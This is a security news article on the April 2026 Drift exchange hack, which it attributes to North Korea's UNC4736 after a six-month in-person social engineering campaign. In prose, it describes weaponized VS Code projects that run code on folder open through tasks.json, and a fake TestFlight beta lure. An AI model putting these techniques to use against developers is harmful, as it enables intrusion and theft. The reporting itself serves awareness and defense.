The Drift Heist: Inside the $285M Hack Driven by a Six-Month DPRK Social Engineering Operation

TL;DR

The $285 million theft from Solana-based exchange Drift on April 1, 2026, has been officially attributed to the North Korean state-sponsored hacking group UNC4736. The breach was the result of a "structured intelligence operation" lasting six months, involving face-to-face social engineering by third-party intermediaries at crypto conferences and the use of weaponized developer tools.

A Masterclass in Long-Term Deception

A recent analysis by Drift has revealed that the devastating April 1, 2026, attack was not a sudden exploit but the culmination of a meticulously planned operation that began in the fall of 2025. Over a six-month period, North Korean threat actors—attributed with medium confidence to the group UNC4736 (also known as AppleJeus or Golden Chollima)—built a web of trust with Drift contributors.

The operation relied heavily on human interaction and professional rapport. Threat actors utilized individuals posing as representatives of a quantitative trading company to approach Drift contributors at various international cryptocurrency conferences.

Notably, the individuals who appeared in person were not North Korean nationals. Drift reported that the regime used third-party intermediaries who were "technically fluent" and possessed "verifiable professional backgrounds." These actors engaged in substantive months-long conversations via Telegram regarding trading strategies and potential vault integrations to establish a functioning operational presence.

Building the "Ecosystem Vault" Trap

To further cement their legitimacy, the group onboarded an "Ecosystem Vault" on Drift between December 2025 and January 2026. This process involved:

Filling out detailed strategy forms.
Asking "detailed and informed" product questions.
Depositing over $1 million of their own funds to build trust.

Throughout February and March 2026, the actors continued to share links for purported tools and applications they were developing, essentially grooming the environment for the final infection.

The Technical Vectors: IDE Weaponization

As the attack unfolded on April 1, the threat actors deleted their Telegram chats and malicious software to cover their tracks. Forensic investigators suspect two primary infection pathways:

Weaponized VS Code Projects: At least one contributor may have been compromised after cloning a code repository shared by the actors. This repository contained a malicious Microsoft Visual Studio Code (VS Code) project. By weaponizing the tasks.json file with the runOn: folderOpen option, the actors triggered malicious code execution the moment the project was opened in the IDE.
Beta Testing Exploitation: A second contributor was reportedly persuaded into downloading a wallet product via Apple’s TestFlight under the guise of beta testing a new app.

The repository-based technique mirrors the "Contagious Interview" campaigns observed since late 2025, which recently prompted Microsoft to introduce new security controls in VS Code versions 1.109 and 1.110.

Attribution: Connecting the Dots

Drift’s attribution to UNC4736 is supported by both on-chain and operational evidence. Fund flows used to stage the Drift operation have been traced back to the October 2024 hack of Radiant Capital, a $53 million theft also linked to North Korea.

UNC4736 has a prolific history in the crypto sector, including the 2023 X_TRADER/3CX supply chain breach. According to CrowdStrike, this group (Golden Chollima) typically targets small fintech firms to ensure "baseline revenue generation" for the DPRK regime, which requires capital to fund ambitious military projects, including nuclear-powered submarines and reconnaissance satellites.

The Global Pipeline of "IT Worker Fraud"

The Drift case highlights a broader, alarming trend in North Korean cyber tactics. The DPRK has evolved into a "fragmented" malware ecosystem, compartmentalizing its operations to avoid total exposure when one branch is discovered.

Beyond direct hacks, the regime is operating a multinational recruitment pipeline. According to reports from Flare and IBM X-Force:

IT Worker Fraud: Operatives land remote roles at Western companies using stolen identities and AI-generated personas.
Third-Party Recruitment: The regime is actively recruiting skilled developers from Iran, Syria, Lebanon, and Saudi Arabia to act as "callers" or "interviewers." These individuals impersonate Western personas to pass technical interviews at U.S. defense contractors and financial institutions.

Conclusion

The Drift hack serves as a stark reminder that the greatest vulnerability in decentralized finance remains the human element. By combining traditional "boots-on-the-ground" social engineering with advanced technical exploits like IDE weaponization, North Korean actors have proven they are willing to invest months of time and millions of dollars in capital to secure a massive payout. For high-value targets, the threat is no longer just a malicious link—it is a six-month-old professional relationship.

Source: https://thehackernews.com/2026/04/285-million-drift-hack-traced-to-six.html